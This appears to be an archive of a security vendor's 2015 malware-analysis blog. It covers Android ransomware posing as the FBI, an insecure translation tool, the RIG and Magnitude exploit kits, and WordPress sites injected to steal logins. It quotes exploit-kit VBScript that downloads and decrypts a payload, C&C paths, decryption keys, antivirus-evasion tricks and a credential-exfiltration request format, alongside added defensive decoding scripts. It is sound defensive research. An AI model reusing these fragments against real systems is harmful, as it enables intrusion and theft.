Thursday, May 28, 2015

Android Ransomware - Porn Droid

Recently, we came across a new variant of Porn Droid - an Android ransomware variant claiming to be from the FBI, which accuses people of watching child porn and then demands a fine of USD 500.

File information:
  • Dropped URL : hxxp://sbqujqosyw[.][.]apk
  • MD5 : 857b887982f11493b4a1db953161e627
  • Virustotal Detection : 5/56
It initially appears to the user as if they are downloading a pornographic video, but once the user clicks on the file, it masquerades as the Google patch update and tricks the user into installing the application.
Disguise as patch application
After clicking "Continue", the malware asks for administrator access to the device, requesting permissions such as "Erase all data", "Set storage encryption" and "Change the screen-unlock password", as shown in the screenshot below.
Admin access
Once the user clicks on the "ACTIVATE" button, the malware gets administrator control of the device and locks it while displaying a fake FBI warning as seen below. It locks the phone by disabling the keyguard and giving the malware application's activity top priority, which ensures that no other application or user activity can override it.

FBI warning message
FBI warning - Payment tab
FBI warning screen with user information
The FBI warning screen also contains dynamic information relevant to the infected device such as the browser history, IMEI number, phone number and victim's picture, which has been taken by the malicious app. This is done to intimidate the end user as a warning message suggests that the information will be used by the FBI to identify the user if the fine is not paid.

Porn Droid Static Analysis

The screenshot below shows the malicious app accessing the browser history and bookmarks to display on the ransom screen. 

Browser history
It then appends the hard coded fake FBI warning message asking for ransom.

Ransom screen text code
The code below shows the malware author's attempt to evade string pattern matching based antivirus (AV) heuristic detection by leveraging a string concatenate function. This is one of the reasons why this sample has a very low (5/56) AV detection rate at the time of our analysis.

"concate" usage to evade AV detection
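As an added example (not the malware's own code), the following Python shows why a literal-pattern signature misses strings that are assembled piecewise and how folding the concatenation before matching restores the detection; the `concate` helper name follows the caption above and is treated as hypothetical, and the Java-like snippet is constructed.

```python
import re

# One Java/smali-style double-quoted string literal (handles escaped quotes).
LITERAL = r'"(?:[^"\\]|\\.)*"'
# Two or more literals joined with '+', e.g. "chi" + "ld po" + "rn."
PLUS_CHAIN = re.compile(LITERAL + r'(?:\s*\+\s*' + LITERAL + r')+')
# A call to a concatenating helper whose arguments are all literals. The name
# "concate" is taken from the screenshot caption; any helper name could be used.
CONCAT_CALL = re.compile(r'\bconcate\s*\(\s*' + LITERAL + r'(?:\s*,\s*' + LITERAL + r')*\s*\)')
LITERAL_RE = re.compile(LITERAL)

# Strings a naive AV signature for this family might look for.
INDICATORS = ("FBI", "child porn")

# Constructed decompiled-style snippet: the ransom text never appears whole.
SAMPLE_SOURCE = '''
String title = concate("F", "B", "I") + " " + "WAR" + "NING";
String body = "Your device has been locked for viewing " + "chi" + "ld po" + "rn.";
String fine = "Pay USD 500";
'''


def fold_literals(src: str) -> str:
    """Merge literals joined by '+' or passed to concate() into one literal."""
    def merge(match):
        pieces = [lit[1:-1] for lit in LITERAL_RE.findall(match.group(0))]
        return '"' + "".join(pieces) + '"'
    src = CONCAT_CALL.sub(merge, src)   # concate("F", "B", "I") -> "FBI"
    return PLUS_CHAIN.sub(merge, src)   # "FBI" + " " + "WAR" + "NING" -> "FBI WARNING"


def find_indicators(src: str, indicators=INDICATORS) -> list:
    """Plain substring matching, as a simple string-based heuristic would do."""
    return [s for s in indicators if s in src]


if __name__ == "__main__":
    print("raw source hits:   ", find_indicators(SAMPLE_SOURCE))        # []
    print("folded source hits:", find_indicators(fold_literals(SAMPLE_SOURCE)))
```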
Another feature we observed in this mobile ransomware, one more commonly seen in PC malware, is a check for the presence of installed AV applications such as ESET, Avast and DrWeb. It then attempts to terminate any AV applications identified.

AV Application check & terminate
In order to stay active on the screen and lock out the phone, it disables the keyguard so the user cannot exit the application.

Disable keyguard
We also observed the following commands that the malicious app may receive from a remote server:
  • destroy - wipe all user data
  • unlock - deactivate the Admin access and unlock the device
The app is also capable of taking pictures using the front-facing camera, which it can then display on the ransom screen:

Front facing camera picture
The malware's Command & Control (C&C) server information is hardcoded in the configuration class as seen below.

Bot configuration
C&C message parameters
  • Server : ""
  • URI : "/pafumokat/bloqyxpn.php"
  • paramString1 : random number in the range of 1 to 3
  • paramString2 : string made of BotID, network, location, phone number, bot version, SDK
  • paramString3 : "Protection"
  • paramString4 : "Bot"
Below is a sample C&C POST request that we captured during our analysis:

C&C request
The best way to avoid such malware is to stick with installing Android apps only from 'official' app stores such as Google Play or the Amazon Appstore.

Tuesday, May 26, 2015

Machine Translators May Leak Confidential Information

One challenge for enterprises dealing with confidential information in conjunction with cloud-based systems is that they must exercise due diligence to ensure that it remains confidential. The steps are beyond the scope of a technical blog, but generally it involves making sure that everyone processing the confidential information understands that it is sensitive and has agreed to protect it.

For cloud services like Enterprise Resource Planning (ERP), Human Resources, Video Conferencing and so on, the confidentiality issues are very well understood, but there are exceptions like machine translation. When we think of data leaks, we rightly look primarily to malicious software (worms, viruses, customized zero-days from Advanced Persistent Threats (APTs), etc.) when seeking to prevent confidential data from leaving a network.

Machine translation tools are an interesting member of the “other” category of legitimate tools that can result in confidential data leaks without malicious intent from user or developer. Machine translation tools range from simple web sites like “youdao” pictured above or Google Translate, where it is pretty clear that information is leaving, up to integrated desktop applications, where the movement of data is not nearly as obvious.

The Youdao Dictionary application is installed like any other and operates like any other, except that the translation engine is remote and the application sends its lookups in plain text via insecure HTTP GETs. The fact that the translation tool is an application running on a user's PC makes it less likely that the person using it would realize that they are leaking information, because it appears that their computer is doing the translation, not a web site.

In the above dissection of a URL retrieved by the tool, we see the word “information” being queried in the “q” field, but it could just as well be that someone isn't entirely sure what “Лечение герпеса Боба Джонса не будет хорошо” means, and would highlight it and click translate. That act results in the application generating something similar to the plaintext query above, except with that chunk of Russian. The user will then learn that the string translates to “Bob Jones' herpes treatment is not going well.” Unfortunately, the request and the translation are transferred in plaintext form, which can be learned by passive interception.

The application that we use as an example is from Youdao (有道), a major Chinese Internet company that, according to Wikipedia, ships an offline and free online version of their translation tool. Through some limited experimentation, Youdao's site does seem to support the same functionality over the more secure, encrypted HTTPS protocol. We have observed insecure communication in the wild for versions ranging from 2.2.16 to 5.4.43, but it would be unfair to discuss the tool without looking at the latest version. The latest version of the Youdao tool we could find, version, was downloaded from and tested on a Windows 7 machine and there was no significant difference in behavior.

Our test version also makes use of plaintext (HTTP) communication by default and appears to automatically translate whatever word is near the mouse pointer, whenever it stops moving, between Chinese and English. It also has an option where a small button appears that you can click (or hover over) to translate a highlighted piece of text. Having used the program, it is easy to imagine why this tool is popular with users who need to translate between Chinese and English. In addition to the translation features, it also keeps users from being bored by providing extra advertisements.

What the tool provides in features, it definitely does not provide in security – while it works as intended and does not appear to be up to anything overtly nefarious, it still sends all the translation requests via the insecure HTTP protocol to a back-end server where the translation takes place.


The conclusion for customers is simple: translation software might send data to networks / systems outside your realm of control – if it does, then exactly as would be the case for a cloud-based ERP or Human Resources system, it is important to know where it goes, how it gets there, and that the third parties processing the information do so in a manner that is compatible with your organization's policies and contractual obligations. Given that the messages to be translated are sent in clear text, anyone on the same network could easily intercept the communication by sniffing network traffic. Translated content could range from benign phrases to highly sensitive information.

Questions to which we do not yet have answers, like whether the translation can be “paused,” if HTTPS can be enabled through configuration, if Youdao's privacy policy prevents disclosure, if any HTTPS functionality is implemented securely, etc. should be answered before deploying YoudaoDict or similar cloud-based translation tools in a confidential setting. Naturally, we would recommend to Youdao that they at least make use of HTTPS by default in future releases of their software, due to the risk of inadvertently disclosing their users' confidential information.


The following experiment was performed to verify whether traffic is still passed in plaintext HTTP GET requests, as it was in previous versions. The setup is a fake letter being written in notepad by an associate at the law firm of Nerd, Geek, and Spaz, LLP, who are defending a client who is being sued for some reason…

When the two lines were highlighted, a little blue book popped up and hovering over the book results in a translation being executed. That translation is actually performed on a remote server and the following URL is visited by the software:

For convenience, we look at the same URL after decoding it and converting to pretty-printed JSON:

    {
        "username": null,
        "netloc": "",
        "vars": {
            "appZengqiang": "0",
            "vendor": "unknown",
            "fytype": "AUTO",
            "keyfrom": "deskdict.screentrans.http.0.stroke",
            "dogVersion": "1.0",
            "pos": "-1",
            "doctype": "xml",
            "q": "Bill%20Jones%20is%20getting%20sued%20for%20some%20really%20embarassing%0D%0Aporn%20that%20was%20found%20on%20his%20work%20computer.%20%20Please%20advise",
            "le": "eng",
            "appVer": "",
            "client": "deskdict",
            "in": "YoudaoDict",
            "xmlVersion": "3.2",
            "proc": "notepad.exe",
            "id": "8bba3b7bdf465c61b",
            "scrfrom": "stroke"
        },
        "fragment": "",
        "scheme": "http",
        "hostname": "",
        "params": "",
        "query": "keyfrom=deskdict.screentrans.http.0.stroke&q=Bill%20Jones%20is%20getting%20sued%20for%20some%20really%20embarassing%0D%0Aporn%20that%20was%20found%20on%20his%20work%20computer.%20%20Please%20advise&pos=-1&doctype=xml&xmlVersion=3.2&dogVersion=1.0&client=deskdict&id=8bba3b7bdf465c61b&vendor=unknown&in=YoudaoDict&appVer=",
        "path": "/fsearch",
        "password": null,
        "port": null
    }

We can see the variables broken apart more easily in the JSON version, and the sentence from our screenshot is clearly visible with “%20” replacing the spaces and “%0D%0A” replacing the end of line. When decoded, the following is the result:

Bill Jones is getting sued for some really embarassing
porn that was found on his work computer.  Please advise

This is the exact content of the highlighted region of the Notepad application. Clearly, the fact that the firm cannot spell “embarassing” correctly could put some egg on their face, making this a potentially very damaging leak. The tool also passes information about the application where the translated text came from, which is indeed “notepad.exe,” version numbers, affiliate identifiers (for companies distributing the program, presumably to share in ad revenues), and other miscellaneous information.
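As an added example (not part of the original post), the following Python rebuilds the URL dissection shown above with the standard library and recovers the leaked text; the hostname is a placeholder because the post redacts it, and the constructed query string carries every field listed under "vars".

```python
import json
from urllib.parse import urlsplit, parse_qs

# Constructed sample modelled on the request in the post. "translator.example"
# stands in for the redacted hostname; the parameters are the ones the post lists.
SAMPLE_URL = (
    "http://translator.example/fsearch?"
    "keyfrom=deskdict.screentrans.http.0.stroke"
    "&q=Bill%20Jones%20is%20getting%20sued%20for%20some%20really%20embarassing"
    "%0D%0Aporn%20that%20was%20found%20on%20his%20work%20computer.%20%20Please%20advise"
    "&pos=-1&doctype=xml&xmlVersion=3.2&dogVersion=1.0&client=deskdict"
    "&id=8bba3b7bdf465c61b&vendor=unknown&in=YoudaoDict&appVer="
    "&proc=notepad.exe&le=eng&fytype=AUTO&appZengqiang=0&scrfrom=stroke"
)


def dissect(url: str) -> dict:
    """Split a translation lookup URL into the fields the pretty-printed JSON shows.

    Query values are percent-decoded. Blank values (appVer=) are kept so every
    field the client transmits is visible to the reviewer.
    """
    parts = urlsplit(url)
    pairs = parse_qs(parts.query, keep_blank_values=True)
    return {
        "scheme": parts.scheme,
        "hostname": parts.hostname,
        "port": parts.port,
        "path": parts.path,
        "query": parts.query,
        "fragment": parts.fragment,
        "vars": {k: v[0] for k, v in pairs.items()},  # single-valued in this request
    }


def leaked_text(record: dict) -> str:
    """The translated text exactly as it left the screen, CRLF line ending preserved."""
    return record["vars"].get("q", "")


def describe_leak(record: dict) -> str:
    """One-line triage summary for a DLP or proxy-log review."""
    v = record["vars"]
    transport = "PLAINTEXT" if record["scheme"] == "http" else "encrypted"
    return (f"{transport} lookup from {v.get('proc', '?')} via {v.get('client', '?')} "
            f"({len(leaked_text(record))} chars)")


if __name__ == "__main__":
    record = dissect(SAMPLE_URL)
    print(json.dumps(record, indent=4, sort_keys=True))
    print(describe_leak(record))
    print(leaked_text(record))
```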

Wednesday, May 20, 2015

RIG Exploit Kit Infection Cycle Analysis


Happy belated birthday to RIG exploit kit! First seen around April 2014, RIG has been in the news several times over the past year. In February, the source code was reportedly leaked online, which likely spurred some of the recent changes we've observed in the kit. ThreatLabZ has been keeping an eye on RIG and in this post we'll cover an example of a full RIG infection cycle.


In the past, RIG used malvertising and compromised sites to send users to RIG landing pages and we've seen no change in this tactic. Compromised sites leading to RIG usually contain an iframe in the page header that loads a RIG proxy domain, which also contains an iframe leading to the RIG landing page. The full infection cycle is shown in the annotated Fiddler session below.

Fig 1: RIG Infection Cycle

In this example, the compromised site actually contains three different malicious iframes in its header. These iframes correspond to line items 37-39 in Fig 1.

Fig 2: iframes on Compromised Site

Out of the three RIG proxy iframes on the compromised site, only one, sunfuji[.]com, is still redirecting victims to RIG landing pages. Much like the iframe on the compromised site, the RIG proxy page contains an iframe redirecting victims to the actual landing page.

Fig 3: RIG Proxy Redirects to RIG Landing

Note that the RIG proxy is a persistent redirector, which will change the landing page location arbitrarily. Taken at a different time, the same page returned the following result:

Fig 4: RIG Proxy Changed Landing Page

Landing Page

The landing page has multiple consistent attributes, starting with the URI. Every RIG landing page URI starts with a question mark, followed by 171 characters. Two examples are below:
  • four.pavementexpress[.]org/?xH6Af7ieJRvHDIs=l3SKfPrfJxzFGMSUb-nJDa9GPkXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFT_zR3AaQ4ilotXQB5MrPzwnEqWwxWeioWBrxaIYwMU95LEQOdviwijm7VFJMonk0DRvWcDnrtMU0gbrA
  • trip.slotsbid[.]com/?xniKfredKx_HCYY=l3SKfPrfJxzFGMSUb-nJDa9GPkXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KV_OpqxveN0SZFT_zR3AaQ4ilotXQB5MrPzwnEqWwxWeioWAqBHbYw1MrcOTEOcz0Aj2yeVBd892zxWA4GMBmL5MVUgbrA
The landing page itself contains three blocks of obfuscated code along with some portions of text from a popular CNET article. The majority of the code is actually a long list of character-delimited strings that are passed to a function that basically splits them on the delimiter and runs 'fromCharCode':

Fig 5: Top of the RIG Landing Page - strings use 't' delimiter

The decode function for each of the three code blocks immediately follows the set of character-delimited strings, as shown in Fig 6.

Fig 6: Decode function for first set of character-delimited strings
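An added analyst-side decoder (not code from the RIG landing page) for the character-delimited strings described above: it finds each delimited numeric literal in a block, guesses the single-character delimiter and applies the fromCharCode equivalent. The JavaScript sample it decodes is constructed and hides only harmless text.

```python
import re

# Constructed sample in the style of the landing page: decimal char codes joined
# by the delimiter 't' (Fig 5). Decoded, the two strings are innocuous JS.
SAMPLE_BLOCK = (
    'var a = "118t97t114t32t105t100t32t61t32t49t59";\n'
    'var b = "105t102t32t40t105t100t32t61t61t32t49t41t32t123t125";\n'
)

# A quoted run of at least three numeric tokens separated by one non-digit char.
ENCODED = re.compile(r'"(\d+(?:[^\d"]\d+){2,})"')


def guess_delimiter(s: str) -> str:
    """Return the single non-digit character separating the codes, or raise."""
    seps = set(re.findall(r"\D", s))
    if len(seps) != 1:
        raise ValueError(f"expected exactly one delimiter, found {sorted(seps)}")
    return seps.pop()


def decode_delimited(s: str, delim: str = "") -> str:
    """Split on the delimiter and map each code through chr (fromCharCode)."""
    delim = delim or guess_delimiter(s)
    return "".join(chr(int(tok)) for tok in s.split(delim) if tok)


def decode_block(js_source: str) -> list:
    """Decode every delimited numeric string literal found in a code block."""
    return [decode_delimited(m.group(1)) for m in ENCODED.finditer(js_source)]


if __name__ == "__main__":
    for clear in decode_block(SAMPLE_BLOCK):
        print(repr(clear))
```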

The deobfuscated first block of code attempts to detect known virtual machine characteristics and other attributes that might indicate an analysis environment. If anything is found, the next two code blocks are not deobfuscated or executed.

Fig 7: Code block 1 deobfuscated - detect analysis environment

The second code block is a large base64-encoded VBScript segment:

Fig 8: Code block 2 deobfuscated - vbscript

The VBScript is executed from the following code:

    function time() {
        window.execScript(base64_decode(scriptvar), "VBscript");
    }
    setTimeout(time, 3001);

Once executed, the VBScript exploits CVE-2014-6332, the so-called 'Godmode' exploit (VT detection - 4/57). AV detection tends to be particularly bad on the VBScript even though the code very closely matches the proof of concept originally publicized. There is a good writeup from TrendMicro, which delves into the details of this vulnerability. If exploitation is successful, the encrypted exe is downloaded, decrypted, and executed on the system. The encryption key for the binary is conveniently in cleartext within the VBScript:

    If objHTTP.Status = 200 Then
        Set objFile = objFSO.CreateTextFile(strSaveTo, True)
        ' the downloaded body is decrypted with the hard-coded 8-byte key before being written to disk
        objFile.Write EnDeCrypt(ByteArray2String(objHTTP.responseBody), "nkiOaWsg")
    End If

The third block of code simply serves up a malicious SWF with no secondary obfuscation:

Fig 9: Code block 3 deobfuscated - malicious SWF

This code is almost the same as in other exploit kits, and the URL of the encrypted binary is being passed to the SWF as a parameter. The exploit in this case was CVE-2015-0313, which affects Flash versions prior to, and the exploit code is contained in a script called 'wow.' Detection on VirusTotal shows 10/57, and there are several public writeups on this vulnerability.

Payload #1 - Injector

The binary payload is encrypted with an 8-byte key, which you can guess from the stream or retrieve from the deobfuscated VBScript.

Fig 10: Encrypted Binary - key is 'WsgnkiOa'

VirusTotal detection is a bit better than 50% for this payload at 32/57. The binary file is a Nullsoft Installer self-extracting archive and extracting the archive reveals three files inside:

Fig 11: Extracted Files from EXE

In addition to these three files, another executable 'b8.exe' is dropped. Once the installer finishes dropping files, it loads the DLL (15/55 on VirusTotal) and begins executing functions to read in the other two files. The file '6ag1rqashtwqw1hgqa' contains data XOR'd with the first 10 bytes of the filename, and the decrypted contents reveal several API calls that give us an idea of what will happen next, for example CreateProcessA, WriteProcessMemory, and ResumeThread.

Fig 12: Decrypting file data with filename

Similarly, the 'Stevie Nicks' .m3u is unfortunately not actually a playlist, but instead an encrypted binary that is decrypted by the DLL using the XOR key "ZhmGqqKwXmJiiS7dzjzPyyaTw0PANF".

Fig 13: Decrypting 'Stevie Nicks' playlist binary
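As an added example (not the sample's code), the following Python reproduces the filename-keyed XOR step described above and triages the recovered bytes for the injection-related imports the post names; the encrypted blob is constructed for the demonstration.

```python
# API names the post lists as the tell-tale of what happens next (process injection).
INJECTION_APIS = (b"CreateProcessA", b"WriteProcessMemory", b"ResumeThread")
# Key quoted in the post for the 'Stevie Nicks' .m3u; the same routine applies to it.
STEVIE_NICKS_KEY = b"ZhmGqqKwXmJiiS7dzjzPyyaTw0PANF"


def xor_with_key(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call both encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def filename_key(dropped_name: str) -> bytes:
    """The data file is XOR'd with the first 10 bytes of its own filename."""
    return dropped_name.encode("ascii")[:10]


def decrypt_dropped_file(dropped_name: str, data: bytes) -> bytes:
    return xor_with_key(data, filename_key(dropped_name))


def find_injection_apis(plaintext: bytes) -> list:
    """Which of the injection-related names occur in the decrypted bytes."""
    return [name.decode() for name in INJECTION_APIS if name in plaintext]


# Constructed stand-in for the dropped file: an import-name blob, encrypted here
# with the filename-derived key so the decryption step can be shown end to end.
SAMPLE_PLAINTEXT = (b"\x00kernel32.dll\x00CreateProcessA\x00"
                    b"WriteProcessMemory\x00ResumeThread\x00")
SAMPLE_ENCRYPTED = xor_with_key(SAMPLE_PLAINTEXT, filename_key("6ag1rqashtwqw1hgqa"))

if __name__ == "__main__":
    recovered = decrypt_dropped_file("6ag1rqashtwqw1hgqa", SAMPLE_ENCRYPTED)
    print(find_injection_apis(recovered))
```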

VirusTotal detection on the decrypted Stevie Nicks binary is 35/56. Ultimately, this leads to creating a hollow process of itself (process hollowing - PDF) which then creates an explorer.exe process and injects code to beacon to the Command & Control (C&C) server. Beacons were frequent and used the URI string '/power/logout.php' to POST to the domain ''

Fig 14: C&C Traffic Sample

Other notable activity includes:
  • Copying to 'C:\Program Files\Common Files\Windows Search 5.3.10\<random>.exe'
  • Using the registry for persistence
  • Hooking ZwOpenFile and ZwOpenProcess
  • Clipboard control

Payload #2 - Blue Bot

After quite some time, a second payload is downloaded named 'cfajrs.exe' from '' which beacons to Four URIs were observed:
  • /help/proxy
  • /help/blog
  • /help/botlogger.php
    • Returns div of HTML with "visitors online" (see Fig 15)
  • /help/target
    • Returns 'STOP|STOP|STOP' during analysis (see Fig 16)

Fig 15: /help/botlogger.php response

Fig 16: /help/target response

VirusTotal detection is 41/56 and indicates this is part of BlueBotnet. Looking at the binary, we see it is a .NET executable that uses no obfuscation at all, so decompilation is straightforward. Looking at the namespace and classes confirms this is called 'Blue_Botnet' and it appears to be a DoS tool.

Fig 17: Blue_Botnet Code Overview

One of the more interesting functions is the 'updateTarget' function, which expects a pipe-delimited list of IP, port, and method. There are multiple different methods accepted for the 'target' command: UDP, TCP, SYN, MCBOTALPHA, HTTP, HTTPROXY, PRESS, and STOP.

Fig 18: Blue_Botnet updateTarget Function

To perform its attacks, the bot has a list of 37 different user agent strings to make detection more difficult (paste of user agents); each request uses a different user agent from the list so requests look like they are coming from multiple different clients instead of from the same source. There is an Italian-language theme to the code, both in some of the variable names and in some of the HTTP headers, for example the Accept-Language header in the HTTP attack function shown below.

Fig 19: Blue_Botnet HTTP Attack Function

Interestingly, the response from botlogger.php is not used in the code and the request may simply be a beacon to the server to keep count of infections.


RIG continues to be a popular and effective exploit kit choice and has evolved over the past year, indicating active development. While other exploit kits are moving toward ransomware and adfraud for monetization of infected victims, RIG is apparently not following this trend and still pushes more traditional malware. ThreatLabZ will continue to monitor RIG for any new developments. For a look at the infrastructure supporting RIG, Trustwave has a great post on the topic.

Monday, May 18, 2015

Magnitude Exploit Kit leading to Ransomware via Malvertising

Magnitude Exploit Kit is a malicious exploit package that leverages a victim’s vulnerable browser plugins in order to download a malicious payload to a system. This technique is known as a drive-by-download attack, which is often leveraged on compromised websites and malicious advertising networks.

We recently found a number of compromised pages following the structure of fake search engine pages, which were seen to redirect visitors to malicious content.

We've also seen a high volume of Malvertising activity leading to Magnitude Exploit Kit hosting sites. The biggest offender in this Malvertising activity is "" operated by the ad network Sunlight Media.
The Malvertising networks lead to redirector domains utilizing 302 cushioning. Our recent data shows the following redirector domains to have been heavily utilized:

  • paypal-invest[.]net
  • paypal-invest[.]info
  • paypal-invest[.]biz

Following the 302 redirect, Magnitude delivers both a malicious Flash payload as well as a highly obfuscated JavaScript payload (MS13-009 Microsoft Internet Explorer COALineDashStyleArray Integer Overflow exploit). Once the browser has been exploited, Magnitude proceeds to a new step in the infection cycle: where the malware payload would normally be downloaded immediately following exploitation, we are now seeing a shellcode payload being served.

Shellcode being served

The shellcode is a simple payload that utilizes the Windows library ‘urlmon.dll’ to attempt to fetch a list of URLs contained within the shellcode. In the cases we have seen so far, only the first URL results in a payload (CryptoWall 3.0), while the others return no data.

CryptoWall payload download

This is a highly profitable ransomware payload that leverages Bitcoin transactions executed over the Tor anonymizer to monetize the attack. Threat actors utilize this method of collection because it cannot be reliably traced back to them. Victims are especially vulnerable to this type of extortion since very few people seem to back up their critical files such as documents and pictures.

CryptoWall decryption instruction

ThreatLabZ has been actively monitoring this Magnitude EK activity and the image below illustrates the transactions we saw for this campaign:

Green represents payload activity; blue represents landing page activity.

As with most threat actors, once they find a location that allows them to host their attacks they tend to stick with it. The lion's share of target IPs seen from our research show that Germany is the biggest hosting location for this activity.

Other countries seen to host this activity: NL (3%), US (2%), JP (2%).

Exploit kits are evolving to bypass standard security solutions that rely on basic URL filtering techniques. Attackers are utilizing various methods of infection, including malvertising and iframe injection on compromised pages. Ransomware is highly profitable, recording up to $33,000 per day at one point. The sophistication of these attacks is on the rise and security leaders need to keep apprised of this maturing illegal market.

Analysis done by Edward Miles & Chris Mannon

Thursday, May 7, 2015

Compromised WordPress sites leaking credentials

Zscaler recently observed a credentials leak campaign on multiple WordPress sites. The compromised sites run backdoor code, which activates when the user submits login credentials. The credentials are encoded and sent to an attacker website in the form of a GET request. So far, we have identified only one domain, "", which is collecting all the credentials from these compromised sites.

The following is a sample list of WordPress websites compromised through this campaign:

Credential Leakage

When unsuspecting users attempt to log in to one of the compromised WordPress sites, they are served injected JavaScript code as part of the login page. Below, we walk through the full exploit cycle illustrating how the user credentials are being stolen through this campaign.

Compromised WordPress login page

As part of the WordPress login page, the user is served malicious information-stealing JavaScript code hosted on “conyouse[.]com”. The obfuscated JavaScript code present in the “wp.js” file can be seen here:
Information stealing JavaScript code

The variable “_0xdd75” stores a list of strings which are used dynamically in the JavaScript above.

List of encoded strings
This code is triggered when the user submits their credentials on the login page of the WordPress site.
The form containing the username and password input boxes has the fixed name “loginform” on all WordPress sites. The preventDefault event method is used to cancel the submit event for the “loginform” form and instead execute the alternate code present in this file. The login credential string is serialised and Base64-encoded.

Information Stealing JavaScript code

The final data is sent to "conyouse[.]com/scr.js", which is statically stored as one of the strings. The final GET request generated is as shown in the traffic:

GET Request relaying stolen credentials

On decoding the encoded string highlighted above, we see that it is relaying the stolen user credentials using the GET request. The format of this GET request is:

"www.conyouse[.]com/scr.js?callback=jQuery<random number>&data=<BASE64_ENCODED_CREDENTIALS>&_=<random number>"

Base64 decoded data string
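An added example (not the campaign's script) of the defender's side: parsing constructed proxy-log lines for GET requests in the relay format above and decoding the `data` parameter so an incident responder can identify which accounts were exposed. The content of the serialised form is an assumption, since the post does not reproduce the decoded string.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs

# Constructed proxy-log lines: client, method, URL. The relay host is written
# defanged as in the post; the data= value is the Base64 of an assumed
# serialised login form ("log=...&pwd=..."), not the campaign's real payload.
SAMPLE_LOG = """\
10.0.0.5 GET http://www.example-blog.test/wp-login.php
10.0.0.5 GET http://www.conyouse[.]com/scr.js?callback=jQuery1710999&data=bG9nPWFsaWNlJnB3ZD1jb3JyZWN0K2hvcnNl&_=1432000000
10.0.0.7 GET http://www.example-blog.test/wp-admin/
"""

RELAY_PATH = re.compile(r"/scr\.js$")


def refang(url: str) -> str:
    """Undo the [.] defanging used in write-ups so the URL parses normally."""
    return url.replace("[.]", ".")


def decode_relay(url: str):
    """Return (callback, decoded data) when the URL matches the relay format, else None.

    Format from the post: .../scr.js?callback=jQuery<random>&data=<BASE64>&_=<random>
    """
    parts = urlsplit(refang(url))
    if not RELAY_PATH.search(parts.path):
        return None
    q = parse_qs(parts.query)
    callback = q.get("callback", [""])[0]
    if "data" not in q or not callback.startswith("jQuery"):
        return None
    raw = q["data"][0]
    raw += "=" * (-len(raw) % 4)  # tolerate stripped Base64 padding
    try:
        decoded = base64.b64decode(raw, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None  # data= present but not Base64 text: not this relay
    return callback, decoded


def scan_log(text: str) -> list:
    """Return (client, relay host, decoded data) for each matching request."""
    hits = []
    for line in text.splitlines():
        client, _method, url = line.split(maxsplit=2)
        found = decode_relay(url)
        if found:
            hits.append((client, urlsplit(refang(url)).hostname, found[1]))
    return hits


if __name__ == "__main__":
    for client, host, data in scan_log(SAMPLE_LOG):
        print(f"{client} -> {host}: {data}")
```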

The complete sequence of actions captured is shown in the screenshot below.

Complete exploit cycle
The end user is oblivious to the fact that the credentials were leaked to a remote attacker's site, as they are redirected to a successfully logged-in WordPress session.

WordPress, being one of the most popular content management systems and blogging platforms, remains an attractive target for cybercriminals due to its large user base. While the initial vector behind the compromise of the sites listed in this blog is unclear, it is extremely important for site administrators to keep their WordPress sites patched with the latest security updates.

Analysis by - Sameer Patil & Deepen Desai